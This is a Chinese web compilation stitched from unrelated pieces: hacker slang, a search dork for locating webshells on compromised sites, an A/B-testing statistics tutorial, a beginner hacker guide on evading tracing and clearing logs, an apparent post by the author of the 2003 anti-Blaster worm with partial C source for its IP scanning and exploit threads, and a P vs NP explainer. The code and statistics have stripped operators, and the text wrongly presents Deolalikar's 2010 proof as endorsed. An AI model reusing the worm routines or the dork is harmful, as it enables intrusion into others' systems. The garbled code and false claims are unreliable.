关于黑客常用术语

肉鸡就是具有最高管理权限的远程电脑。简单的说就是受你控制的远程电脑。肉鸡可以是win、Unix/Linux……等各种系统；肉鸡可以是一家公司的服务器，一家网站的服务器，甚至是美国白宫或军方的电脑，只要你有这本事入侵并控制他，呵呵。莱鸟所说用的肉鸡一般是开了3389端口的Win2K系统的服务器。

要登陆肉鸡，必须知道3个参数：远程电脑的IP、用户名、密码。

webshell是什么？这是很多朋友在疑惑的问题，什么是webshell？今天我们就讲讲这个话题！

webshell是web入侵的脚本攻击工具。简单的说来，webshell就是一个asp或php木马后门，黑客在入侵了一个网站后，常常在将这些asp或php木马后门文件放置在网站服务器的web目录中，与正常的网页文件混在一起。然后黑客就可以用web的方式，通过asp或php木马后门控制网站服务器，包括上传下载文件、查看数据库、执行任意程序命令等。

为了更好理解webshell我们学习两个概念：

什么是“木马”？“木马”全称是“特洛伊木马(Trojan Horse)”，原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上，“特洛伊木马”指一些程序设计人员在其可从网络上下载(Download)的应用程序或游戏中，包含了可以控制用户的计算机系统的程序，可能造成用户的系统被破坏甚至瘫痪。

什么是后门？大家都知道，一台计算机上有65535个端口，那么如果把计算机看作是一间屋子，那么这65535个端口就可以它看做是计算机为了与外界连接所开的65535扇门。每个门的背后都是一个服务。有的门是主人特地打开迎接客人的（提供服务），有的门是主人为了出去访问客人而开设的（访问远程服务）——理论上，剩下的其他门都该是关闭着的，但偏偏由于各种原因，很多门都是开启的。于是就有好事者进入，主人的隐私被刺探，生活被打扰，甚至屋里的东西也被搞得一片狼迹。这扇悄然被开启的门——就是“后门”。

webshell的优点

webshell 最大的优点就是可以穿越防火墙，由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的，因此不会被防火墙拦截。并且使用webshell一般不会在系统日志中留下记录，只会在网站的web日志中留下一些数据提交记录，没有经验的管理员是很难看出入侵痕迹的。

如何寻找webshel：

1，脚本攻击SQL注入

2，使用注入工具

3，在浏览器里打开百度,输入搜索关键词"在本页操作不需要FSO支持"或者"一次只能执行一个操作",然后点击搜索,很快就可以看到检索到了大量的查询结果.

朋友圈评论表情包原来只是A/B测试？一文搞懂A/B测试与统计学原理

还记得前一阵子风靡朋友圈的表情包评论斗图吗？

但是从12月24日起，陆续有网友反映微信朋友圈无法评论表情包了。当时就有网友猜测该功能非正式版本，很有可能为A/B测试。

12月25日，微信官方回应表示：“此前，我们对朋友圈评论发送表情包功能进行灰度测试，部分用户更新 7.0.9 版本后可使用。目前，该功能已暂停。”

为什么有的用户还可以用表情包，而有的用户就不能用了呢？这其实就是A/B测试。

与微信这次的测试类似，假设我们的网站有一个落地页。关于详情按钮，设计团队偏向绿色，而产品经理则主张蓝色。双方对他们的选择都有强烈的看法。 谁来决定？ 选择是否正确？

根据范冰在《增长黑客》一书中的介绍，A/B测试，简单说来就是针对想调研的问题提供两种不同的备选解决方案（比如两个注册页面），然后让一部分用户使用方案A，另一部分用户使用方案B，最终通过数据观察对比确定最优方案。

A/B测试的所有步骤都要遵循 单变量 的思想，比如

1.将测试用户随机分为两部分

2. 测试要在同一时间进行

想像一下，如果我们要测试游戏注册按钮蓝色绿色孰优孰劣。蓝色版本在周一周二测试，绿色版本在周六周日测试，测试的结果是绿色按钮点击率更高。但是，由于周末游戏用户活跃度原本就比较高，测试结果很有可能受到了时间因素的影响。

A/B测试不是一次性的试验，而是一个不断【设定目标】-【提出假设】-【变量修改】-【运行试验】-【衡量结果】的一个循环过程

目标： 目标是用于判断哪个版本更好的量化指标。

假设 ：生成A/B测试的假设。

变量 ：确定单一变量，对网站当前版本的该变量进行所需的更改。

试验 ：网站的访问者将被随机分配到两个版本，并收集相应的数据。

结果 ：通过假设检验与置信区间来分析收集到的数据，得出结论。

从原理上看，A/B测试通过抽取样本来估计总体，在上面的例子中：

样本  是随机抽取使用该版本的用户的点击动作（0或1）

总体  是（如果网站全面改版）所有使用该版本的用户的点击动作（0或1）

但这样就足够了吗？如果我们最后得出的结果是A版本点击率5%，B版本点击率5.2%，B版本一定就是更好的？事实上这很有可能只是由抽样误差引起的。

这时我们就需要通过  假设检验  对结论进行数据支撑

针对具体业务问题，我们可以将其提取成统计问题。以新旧哪个版本的点击率更高这个业务问题为例，假设检验的步骤如下

1. 提出假设

将新版本的点击率写成p1，旧版本的点击率写成p2

H0：p1=p2

H1：p1p2

原假设H0是新旧版本点击率没有差异，备选假设H1是新版本点击率高于旧版本。

如果有足够的证据去拒绝原假设H0，我们就可以得到 p1p2 的结论。

2. 确定显著性水平a

提前设定一个比例。如果测试结果出现的概率低于这个比例，我们就有足够的理由拒绝原假设H0。一般取5%。

3. 确定检验统计量

为了计算测试结果出现的概率，我们需要一个已知概率分布的统计量。一般对比双样本转化比率差异用z统计量，z服从标准正态分布。

                                    

4. 根据样本计算统计量及p值

我们通过试验得到了该统计量的值。由于已知其概率分布，我们能算出“出现比试验结果更极端情况”的概率，即p值。

5. 得出结论

如果p值小于我们之前设定的显著性水平，我们就有足够的证据拒绝H0假设，即新版本点击率比旧版本高

如果p值不小于我们之前设定的显著性水平，我们没有足够的证据拒绝H0假设，即新旧版本点击率没有明显差别

统计量z是怎么来的呢？为什么z服从标准正态分布？

首先要明确一点，我们对比两个版本的点击率，就是在进行双样本比例假设检验，因为我们有两个总体。

假设我们有随机变量 (xi), i=1,...,n，xi {0,1}，0代表失败，1代表成功

那么xi服从伯努利分布，xi~Bernoulli(p)，p为总体比率

根据伯努利分布定义，xi的期望为p, xi的方差为 p(1-p)

现在我们考虑 

p' 的期望是 n*E(x)/n = p

p' 的方差是 n*var(x)/n^2 = p(1-p)/n

现在我们考虑统计量 

根据中心极限定理，不论xi服从什么分布，当n趋向无穷时，Z都服从标准正态分布

首先我们有原假设 H0: p1=p2

如果 xi~Bernoulli(p1) 来自总体1，yi~Bernoulli(p2) 来自总体2，x之间iid，y之间iid，x与y独立  

p1' 期望为 p1，方差为 p1(1-p1)/n1

p2' 期望为 p2，方差为 p2(1-p2)/n2

因为 在H0假设下 p1=p2:=p ，

p1' - p2' 期望为 p1-p2=0

p1' - p2' 方差为 p(1-p)(1/n1+1/n2)

由于 p1=p2=p 未知，我们用样本统计量 p'=(n1*p1'+n2*p2')/(n1+n2) 来代替 p

根据中心极限定理

服从标准正态分布

在这个模拟例子里，我们分别在两个版本抽取了1000个样本

版本1获得237个点击，点击率为23.7%

版本2获得195个点击，点击率为19.5%

Z统计量为2.28，p值为0.01120.05

所以我们得出结论，版本1点击率显著高于版本2

黑客要知道些什么基本知识？

一、学习技术：

互联网上的新技术一旦出现，黑客就必须立刻学习，并用最短的时间掌握这项技术，这里所说的掌握并不是一般的了解，而是阅读有关的“协议”（rfc）、深入了解此技术的机理，否则一旦停止学习，那么依靠他以前掌握的内容，并不能维持他的“黑客身份”超过一年。

初级黑客要学习的知识是比较困难的，因为他们没有基础，所以学习起来要接触非常多的基本内容，然而今天的互联网给读者带来了很多的信息，这就需要初级学习者进行选择：太深的内容可能会给学习带来困难；太“花哨”的内容又对学习黑客没有用处。所以初学者不能贪多，应该尽量寻找一本书和自己的完整教材、循序渐进的进行学习。

二、伪装自己：

黑客的一举一动都会被服务器记录下来，所以黑客必须伪装自己使得对方无法辨别其真实身份，这需要有熟练的技巧，用来伪装自己的IP地址、使用跳板逃避跟踪、清理记录扰乱对方线索、巧妙躲开防火墙等。

伪装是需要非常过硬的基本功才能实现的，这对于初学者来说成的上“大成境界”了，也就是说初学者不可能用短时间学会伪装，所以我并不鼓励初学者利用自己学习的知识对网络进行攻击，否则一旦自己的行迹败露，最终害的害是自己。

如果有朝一日你成为了真正的黑客，我也同样不赞成你对网络进行攻击，毕竟黑客的成长是一种学习，而不是一种犯罪。

三、发现漏洞：

漏洞对黑客来说是最重要的信息，黑客要经常学习别人发现的漏洞，并努力自己寻找未知漏洞，并从海量的漏洞中寻找有价值的、可被利用的漏洞进行试验，当然他们最终的目的是通过漏洞进行破坏或着修补上这个漏洞。

黑客对寻找漏洞的执著是常人难以想象的，他们的口号说“打破权威”，从一次又一次的黑客实践中，黑客也用自己的实际行动向世人印证了这一点--世界上没有“不存在漏洞”的程序。在黑客眼中，所谓的“天衣无缝”不过是“没有找到”而已。

四、利用漏洞：

对于正派黑客来说，漏洞要被修补；对于邪派黑客来说，漏洞要用来搞破坏。而他们的基本前提是“利用漏洞”，黑客利用漏洞可以做下面的事情：

1、获得系统信息：有些漏洞可以泄漏系统信息，暴露敏感资料，从而进一步入侵系统；

2、入侵系统：通过漏洞进入系统内部，或取得服务器上的内部资料、或完全掌管服务器；

3、寻找下一个目标：一个胜利意味着下一个目标的出现，黑客应该充分利用自己已经掌管的服务器作为工具，寻找并入侵下一个系统；

4、做一些好事：正派黑客在完成上面的工作后，就会修复漏洞或者通知系统管理员，做出一些维护网络安全的事情；

5、做一些坏事：邪派黑客在完成上面的工作后，会判断服务器是否还有利用价值。如果有利用价值，他们会在服务器上植入木马或者后门，便于下一次来访；而对没有利用价值的服务器他们决不留情，系统崩溃会让他们感到无限的快感！

第二节、黑客应掌握的基本技能

从这一节开始，我们就真正踏上学习黑客的道路了，首先要介绍的是作为一名初级黑客所必须掌握的基本技能，学习这可以通过这一节的阅读了解到黑客并不神秘，而且学习起来很容易上手。为了保证初学者对黑客的兴趣，所以本书采取了循环式进度，也就是说每一章节的内容都是独立、全面的，学习者只有完整的学习过一章的内容，才能够进而学习下一章的内容。

一、了解一定量的英文：

学习英文对于黑客来说非常重要，因为现在大多数资料和教程都是英文版本，而且有关黑客的新闻也是从国外过来的，一个漏洞从发现到出现中文介绍，需要大约一个星期的时间，在这段时间内网络管理员就已经有足够的时间修补漏洞了，所以当我们看到中文介绍的时候，这个漏洞可能早就已经不存在了。因此学习黑客从一开始就要尽量阅读英文资料、使用英文软件、并且及时关注国外著名的网络安全网站。

二、学会基本软件的使用：

这里所说的基本软件是指两个内容：一个是我们日常使用的各种电脑常用命令，例如ftp、ping、net等；另一方面还要学会有关黑客工具的使用，这主要包括端口扫描器、漏洞扫描器、信息截获工具和密码破解工具等。因为这些软件品种多，功能各不相同，所以本书在后面将会介绍几款流行的软件使用方法，学习者在掌握其基本原理以后，既可以选择适合自己的，也可以在“第二部分”中找到有关软件的开发指南，编写自己的黑客工具。

三、初步了解网络协议和工作原理：

所谓“初步了解”就是“按照自己的理解方式”弄明白网络的工作原理，因为协议涉及的知识多且复杂，所以如果在一开始就进行深入研究，势必会大大挫伤学习积极性。在这里我建议学习者初步了解有关tcp/ip协议，尤其是浏览网页的时候网络是如何传递信息、客户端浏览器如何申请“握手信息”、服务器端如何“应答握手信息”并“接受请求”等内容，此部分内容将会在后面的章节中进行具体介绍。

四、熟悉几种流行的编程语言和脚本：

同上面所述一样，这里也不要求学习者进行深入学习，只要能够看懂有关语言、知道程序执行结果就可以了。建议学习者初步学习C语言、asp和cgi脚本语言，另外对于htm超文本语言和php、java等做基本了解，主要学习这些语言中的“变量”和“数组”部分，因为语言之间存在内在联系，所以只要熟练掌握其中一们，其他语言也可以一脉相同，建议学习C语言和htm超文本语言。

五、熟悉网络应用程序：

网络应用程序包括各种服务器软件后台程序，例如：wuftp、Apache等服务器后台；还有网上流行的各种论坛、电子社区。有条件的学习者最好将自己的电脑做成服务器，然后安装并运行一些论坛代码，经过一番尝试之后，将会感性的弄清楚网络工作原理，这比依靠理论学习要容易许多，能够达到事半功倍的效果

/本篇文章来源于 新贵网 原文出处：

《冲击波杀手》那个黑客是谁？

这个问题警察也想知道 也没人在网上公布

给您转一篇文章 也许对您有用

冲击波杀手的作者网上现身

前言：“冲击波”蠕虫爆发后，大量个人主机及服务器遭受侵袭，各大安全公司，杀毒厂商纷纷推出各种解决方案，不料短短几日内，又出现了来历不明的新蠕虫，经过一些安全专家的反向编译和分析，惊讶的发现，该蠕虫的工作目标居然是消灭冲击波蠕虫并自动为受害主机进行补丁，而且该蠕虫还具有定时自毁功能，显然作者的目标还是有一定的善意因素，但是蠕虫毕竟是蠕虫，因为大量icmp包的发送，还是能够给企业局域网络带来极大的压力，就此，对蠕虫的危害性依然要保持极大的关注和警惕，相关文章可以参见

8月20日，蠕虫作者突然现身，出现在某安全论坛，以下是该作者论坛上声明的转载，并公开了源代码。

下文为作者自述-转自某安全论坛

玩过了～～ 虫虫四个小时之内已经完成了任务～～～ 不得不写这豆腐块～～～

char *szMe = "=========== I love my wife baby ~~~ Welcome Chian~~~

Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins";

偶：小地方小公司小小程序员

偶从不玩安全的，临时抱佛脚，看了些资料，仓促写了这个烂虫虫~~~

A 看不惯老外小鸟儿写的什么什么波的烂虫~~ ，虽然偶临时玩安全的即兴之作亦很烂

~~~

B 看不惯国内某几家放毒公司的商业炒作，发网难财，违背良心，误导民众

偶就帮你丫的除光了虫虫，打光了补丁，没想到他丫的误导的更变态~~~ 你丫的方脑壳

~~

C 帮偶不认识的 flashsky 兄解脱些吧~~~ 他丫的 Bill该死,快去谢flashsky~~~

D VirusBOy 兄，baby 可不是情人吆，偶家小子两岁就开始跟偶抢机器了~~

E 长了这么大,算首次报效社会吧~~~

F 几年？进去就是了，不就是个坐吗， 切~~~ 偶是吓大的!

======================================================

0 chian 系 china 笔误~~ 敲的快了，某个指头先到~~~

1 早在 8/13 国际国内骨干路由就丢弃了 135 syn ,只有加入WebDav才玩得转~~~

2 RpcDcom WebDav 使用同一 反向shellcode, 用 eyas的, lion修改

(声明：谁也没给偶，偶从一被人遗忘的公开程序中sniffer的,谢两位)

此shellcode 新进程建在svchost下，就一个Call Ebx 通杀了 all 2k xp

他丫的，还有放毒公司言导致xp机器重启云云的~~~

3 Bill该死 有 Tftpd.exe, 干吗不用，虽然偶看过 Tftp 协议，练习写过~~~

4 某年某月某日某时某刻，

溜出国门，辗转借了几台 Xeon™ 4 cpus, 2g memory 机器

架起 2000 线程的 WebDav 投放玩具，对准某国骨干的几个B段

10 分钟内投放了三四百个种子(早知道有这么多，就换个玩法 ~~~

5 发icmp包是为了提高搜索效率，算唯一的危害了~~~ 刺激一下也好~~~

打补丁的虫，杀虫的虫，再不有点儿小危害就丢尽了虫虫家族的脸~~~

//偶婆婆, 烂代码~~~ 将就看吧~~~

BOOL DoServicePackFunction()

{

DWORD nSystemVer = Win2000OrXp();

if ( !( nSystemVer == 0 || nSystemVer == 1) )

return FALSE; // not 2k or xp

if ( ReadRegServicePack(nSystemVer) )

return FALSE; //已经安装了

//识别语言版本

int nLanguageID;

unsigned int unOemCP = GetOEMCP();

LCID lcid = GetSystemDefaultLCID();

WORD wMain = PRIMARYLANGID(lcid);

WORD wSub = SUBLANGID(lcid);

if ( unOemCP == 437 wMain == 9 wSub == 1 ) //en

nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~

//管不了小欧洲~~ 俄罗斯牛人有自己的玩法

~~

else if ( unOemCP == 936 wMain == 4 wSub == 2 ) //cn

nLanguageID = 1; //就是为这个来的~~

else if ( unOemCP == 950 wMain == 4 wSub == 1 ) //tw

nLanguageID = 2; //同胞骨肉的忙,一定要帮~~

else if ( unOemCP == 932 wMain == 0x11 wSub == 1 ) //jp

nLanguageID = -1; //偶好有干掉鬼子机器的冲动！

//罢了，冤冤相报何时了~~~ 希望他丫的自新

~~~ 再玩火就灭了他丫的~~

else if ( unOemCP == 949 wMain == 0x12 wSub == 1 ) //kr

nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~

else{

nLanguageID = -1;

}

if ( nLanguageID == -1)

return FALSE;

char szServicePack[] = "RpcServicePack.exe";

// downlaod it~~~

if ( !nSystemVer ) { // 2k

if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) )

return FALSE;

}

else{

if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) )

return FALSE;

}

char szExec[180];

sprintf(szExec, "%s -n -o -z -q", szServicePack);

HANDLE hProcess = MakeProcess( szExec );

if ( hProcess == NULL )

return FALSE;

if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内

未完成

TerminateProcess(hProcess,1);

CloseHandle(hProcess);

DeleteFile(szServicePack);

return FALSE;

}

CloseHandle(hProcess);

Sleep(15000);

DeleteFile(szServicePack);

if ( ReadRegServicePack(nSystemVer) ) {

ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot

it~~~

Sleep(20000); //说偶重启有过？ 不重启补丁无效，

找 Bill该死 说去~~~

}

return TRUE;

}

// IN: 始ip, B段数量, 是否随机，是否换WebDav //更烂~~~ 凑合着看~~~

void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL

bWebDav)

{

HANDLE hThread = NULL;

BOOL bFirst = TRUE;

u_long uComp;

for (int i=0;i (nBCount * 256 * 256); i++){

if ( bRand )

uComp = MakeRandIp();

else

uComp = i + ulIpStart;

if ( //还是屏蔽掉部分目标，免得目标中招后，再玩就把下一代干掉了，不破坏的好

~~~

(BYTE)uComp == 0xc5 ||

(BYTE)(uComp8) == 0xc5 ||

(BYTE)(uComp16) == 0xc5 ||

(BYTE)(uComp24) == 0xc5 ||

(WORD)uComp == 0x9999 ||

(WORD)(uComp8) == 0x9999 ||

(WORD)(uComp16) == 0x9999 )

continue;

u_long *myPara = new u_long;

if ( myPara == NULL ){//如果分配失败，再尝试一次

Sleep(100);

myPara = new u_long;

}

if ( myPara ){

if ( hThread )

CloseHandle(hThread);

*myPara = htonl( uComp);

DWORD dwThreadId;

if (bWebDav)

hThread =

CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,dwThreadId);

else

hThread =

CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,dwThreadId);

Sleep(2);

}

//添加此处代码，避免首次执行时，线程中的

InterlockedIncrement(g_CurThreadCount) 未来得及运行，一次性建立了N个线程的

bug!

if ( bFirst (i = nMaxThread) ){

Sleep(2000);

bFirst = FALSE;

}

while(g_CurThreadCount = nMaxThread) // #define nMaxThread 300 ,不小心，

玩过了~~~

Sleep(2);

}

Sleep(60000);

}

//服务模式和控制台模式公用主程序

void DoIt()

{

WSADATAwsd;

if(WSAStartup(MAKEWORD(2,2),wsd)!=0)

return;

//杀蠕虫

KillMsblast();

//卸载

SYSTEMTIME st;

GetLocalTime(st);

if ( st.wYear == 2004 ){

MyDeleteService(szServiceName);

MyDeleteService(szServiceTftpd);

RemoveMe();

ExitProcess(1); //其实不必，RemoveMe()中借用了前辈的代码，2k下，退出程序时将

自身文件删除了

}

srand( GetTickCount() );

memset(pPingBuffer, '\xAA', sizeof(pPingBuffer));

//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补

丁已经打够了!~~~

//准备WebDav发送缓冲区

do{

pWebDavExploitBuffer = new char[68000];

Sleep(100);

}while(pWebDavExploitBuffer == NULL);

//必须在checkonlien 之前,一次装配好子弹

PressWebDavBufferOnce();

PressRpcDcomBufferOnce();

CheckOnlienAndPressData(); //get LocalIp 修正子弹中的反向ip 和 端口

//打补丁

DoServicePackFunction();

//建立接收线程

DWORD dwThreadID;

HANDLE

hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L

PVOID)NULL,0,dwThreadID);

if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞，有反连，再建线程处理之,

同时处理多个反连

return;

CloseHandle(hWorkThread);

if ( !MyStartService(szServiceTftpd) ){

Sleep(1000);

InstallTftpService();

Sleep(1000);

MyStartService(szServiceTftpd);

}

Sleep(2000); //等待接收线程中的全局 rand bind port

u_long ulIP;

for(;{ //估算了一下，普通机器2小时一循环

//首先扫描本ip段

CheckOnlienAndPressData();

ulIP = ntohl(inet_addr(szLocalIp));

ulIP = 0xffff0000;

BeginExploitFunction( ulIP, 1, 0, 0);

//再扫描本ip前后3个段

CheckOnlienAndPressData();

if ( rand() % 2)

ulIP += 0x00010000;

else

ulIP -= 0x00030000;

BeginExploitFunction( ulIP, 3, 0, 0);

//再扫描WebDav一个段,跳出 135 syn封锁

CheckOnlienAndPressData();

ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //请 wdIpHead[] B段IP商注意~~~,

立即采取补救措施~~~ sorry~~~

BeginExploitFunction( ulIP, 1, 0, 1);

//再扫描随机的IP, 数量1个 B段, rpc or webdav

CheckOnlienAndPressData();

if ( rand() % 2)

BeginExploitFunction( ulIP, 1, 1, 0);

else

BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~

KillMsblast();

}

//WSACleanup();

}

--------------------------------------------------------------------------------------------------

为方便阅读，增加几个补充说明

1.flashsky 创始人之一，启明星辰安全专家，擅长古体诗词，7月中公开rpc漏洞利用方式源代码，公开溢出分析报告，造成全球安全领域的震动，冲击波蠕虫的主要传播技术来源于这位高手公开的技术描述。

2.VirusBOy 懂点安全的小朋友，水平不咋地，不过你最好别招惹他，DDOS你一把也够受的。

3.某安全公司安全专家评论，该帖子内容基本属实，蠕虫源代码已经得到确认。

瑞星反病毒检测中心今晚再次截获利用微软RPC漏洞进行传播的病毒。不过，这个新病毒生来就是原冲击波病毒的克星。

瑞星反病毒工程师分析说：该病毒的特点是将“冲击波”(Worm.Blaster)病毒干掉，并在系统内值入，预防冲击波病毒的疫苗。

然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然后该病毒会开启数百个的线程PING其它IP地址，并通过RPC漏洞快速传播自己，消耗大量CPU和网络资源，并且有可能会导致系统死机。该病毒的作者似乎无意作恶，病毒设定在2004年自行毁灭。

由于该病毒采用PING方式进行探测，只感染能够PING通的机器，因此瑞星反病毒工程师提醒广大用户，设置防火墙的规则，禁止ping，这样可以有效防止该病毒的入侵。

网络黑客的定义

中文名称：黑客英文名称：hacker定义：利用系统安全漏洞对网络进行攻击破坏或窃取资料的人。应用学科：通信科技（一级学科）；网络安全（二级学科）

定义

热衷研究、撰写程序的专才，精通各种计算机语言和系统，且必须具备乐于追根究底、穷究问题的特质。“黑客”一词是由英语Hacker音译出来的，是指专门研究、发现计算机和网络漏洞的计算机爱好者。他们伴随着计算机和网络的发展而产生成长。黑客对计算机有着狂热的兴趣和执着的追求，他们不断地研究计算机和网络知识，发现计算机和网络中存在的漏洞，喜欢挑战高难度的网络系统并从中找到漏洞，然后向管理员提出解决和修补漏洞的方法。 黑客不干涉政治，不受政治利用，他们的出现推动了

计算机和网络的发展与完善。黑客所做的不是恶意破坏，他们是一群纵横于网络上的大侠，追求共享、免费， 在黑客圈中，hacker一词无疑是带有正面的意义，例如system hacker熟悉操作系统的设计与维护；password hacker精于找出使用者的密码，若是computer hacker则是通晓计算机，可让计算机乖乖听话的高手。 黑客基本上是一项业余嗜好，通常是出于自己的兴趣，而非为了赚钱或工作需要。

关于黑客的漫画(11张)根据开放原始码计划创始人Eric Raymond对此字的解释，hacker与cracker是分属两个不同世界的族群，基本差异在于，hacker是有建设性的，而cracker则专门搞破坏。 hacker原意是指用斧头砍材的工人，最早被引进计算机圈则可追溯自1960年代. 加州柏克莱大学计算机教授Brian Harvey在考证此字时曾写到，当时在麻省理工学院中(MIT)的学生通常分成两派，一是tool，意指乖乖牌学生，成绩都拿甲等；另一则是所谓的 hacker，也就是常逃课，上课爱睡觉，但晚上却又精力充沛喜欢搞课外活动的学生。 其实黑客的本意是整天到别人的空间或博客里逛的人，骇客才是现今“黑客”的意思。但由于“骇客”的“骇”（hài）和“黑客”的“黑”（hēi）音相似，所以被人们误认为在网络上进行破坏的人叫做“黑客”。

可以去看看。

希望采纳，谢谢。

没有最好的黑客教程----看完上边的----你懂得！！

希望采纳，谢谢。

p=NP是什么意思？

P对NP问题是克雷数学研究所高额悬赏的七个千禧年难题之一，同时也是计算机科学领域的最大难题，关系到计算机完成一项任务的速度到底有多快。

1、简介

P对NP问题是Steve Cook于1971年首次提出。"P/NP问题"，这里的P指在多项式时间(Polynomial)里，一个复杂问题如果能在多项式时间内解决，那么它便被称为P问题，这意味着计算机可以在有限时间内完成计算;NP指非确定性多项式时间(nondeterministic polynomial)，一个复杂问题不能确定在多项式时间内解决，假如NP问题能找到算法使其在多项式时间内解决，也就是证得了P=NP。比NP问题更难的则是NP完全和NP-hard，如围棋便是一个NP-hard问题。2010年8月7日，来自惠普实验室的科学家Vinay Deolalikar声称已经解决了"P/NP问题" ，并公开了证明文件。

2、排序问题

如果我们只能通过元素间的相互比较来确定元素间的相互位置，而没有其他的附加可用信息，则排序问题的复杂性是O(nlgn)，但是排序算法有很多，冒泡法是O(n^2)，快速排序平均情况下是O(nlgn)等等，排序问题的复杂性是指在所有的解决该问题的算法中最好算法的复杂性。问题的复杂性不可能通过枚举各种可能算法来得到，一般都是预先估计一个值，然后从理论上证明。

3、定义

为了研究问题的复杂性，我们必须将问题抽象，为了简化问题，我们只考虑一类简单的问题，判定性问题，即提出一个问题，只需要回答yes或者 no的问题。任何一般的最优化问题都可以转化为一系列判定性问题，比如求从A到B的最短路径，可以转化成:从A到B是否有长度为1的路径?从A到B是否有长度为2的路径?。。。从A到B是否有长度为k的路径?如果问到了k的时候回答了yes，则停止发问，我们可以说从A到B的最短路径就是k。如果一个判定性问题的复杂度是该问题的一个实例的规模n的多项式函数，则我们说这种可以在多项式时间内解决的判定性问题属于P类问题。P类问题就是所有复杂度为多项式时间的问题的集合。然而有些问题很难找到多项式时间的算法(或许根本不存在)，比如找出无向图的哈米尔顿回路问题，但是我们发现如果给了我们该问题的一个答案，我们可以在多项式时间内判断这个答案是否正确。比如说对于哈米尔顿回路问题，给一个任意的回路，我们很容易判断他是否是哈米尔顿回路(只要看是不是所有的顶点都在回路中就可以了)。这种可以在多项式时间内验证一个解是否正确的问题称为NP问题。显然，所有的P类问题都是属于NP问题的，但是现在的问题是，P是否等于NP?这个问题至今还未解决。这就是P对NP问题。

4、P≠NP论证

如果P=NP，那么每个答案很容易得到验证的问题也同样可以轻松求解。这将对计算机安全构成巨大威胁，目前加密系统的破解就相当于要将一个整数分解为几个因数的乘积，正是其求解过程的繁琐，才能杜绝黑客的入侵。

而现在，美国惠普实验室的数学家维奈·迪奥拉里卡围绕一个众所周知的NP问题进行论证，给出了P≠NP的答案。这就是布尔可满足性问题(Boolean Satisfiability Problem)，即询问一组逻辑陈述是否能同时成立或者互相矛盾。迪奥拉里卡声称，他已经证明，任何程序都无法迅速解答这个问题，因此，它不是一个P问题。

如果迪奥拉里卡的答案成立，说明P问题和NP问题是不同的两类问题，这也意味着计算机处理问题的能力有限，很多任务的复杂性从根本上来说也许是无法简化的。

对于有些NP问题，包括因数分解，P≠NP的结果并没有明确表示它们是不能被快速解答的;但对于其子集NP完全问题，却注定了其无法很快得到解决。其中一个著名的例子就是旅行商问题(Travelling Salesman Problem)，即寻找从一个城市到另一个城市的最短路线，答案非常容易验证，不过，如果P≠NP，就没有计算机程序可以迅速给出这个答案。

迪奥拉里卡的论文草稿已经得到了复杂性理论家的认可，但随后公布的论文终稿还将接受严格的审查。